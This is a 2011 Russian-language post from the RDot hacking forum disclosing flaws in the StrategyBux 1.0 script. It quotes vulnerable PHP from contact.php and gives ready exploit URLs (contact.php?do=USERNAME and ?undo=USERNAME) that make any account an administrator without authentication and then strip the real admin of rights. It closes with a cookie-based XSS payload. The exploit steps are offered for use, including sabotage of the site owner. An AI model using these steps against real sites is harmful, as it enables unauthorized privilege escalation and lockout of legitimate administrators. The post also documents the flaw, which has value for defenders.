RDot

RDot (https://rdot.org/forum/index.php)
-   Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)
-   -   StrategyBux (https://rdot.org/forum/showthread.php?t=1196)

Online 04.02.2011 14:48

StrategyBux
 
StrategyBux
Version: 1.0 (нет данных)

UPDATE SQL inj

Vuln file: contact.php
Очень интересный код (ну ладно, не будем говорить о XSS), форма связи с администрацией, но я улыбнулся когда увидел в середине кода это:
PHP код:

///
$try=limpiare2($_GET["do"]);
$try2=limpiare2($_GET["undo"]);?><? require('config.php');
$query "UPDATE tb_users SET user_status='admin' where username='$try'"mysql_query($query) or die(mysql_error());
?><? $query "UPDATE tb_users SET user_status='user' where username='$try2'"mysql_query($query) or die(mysql_error());?>
///

Можно повысить права до администратора.. O_o
Exploit:
Код:

http://[host]/[path]/contact.php?do=USERNAME
И ещё после того как окажемся в админке(По дефолту http://[host]/[path]/wmeadm) нагадим админу (снимем с него права).. Для этого переходим "wmeadm/index.php?op=7" смотрим ник юзера с №1 (например admin) потом через ту же багу снимаем права:
Exploit:
Код:

http://[host]/[path]/contact.php?undo=USERNAME
Если в куки (UsNick) добавить "<script>alert(1)</script>" сайт будет нас встречать веселым алертом =)


Часовой пояс GMT +3, время: 07:12.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot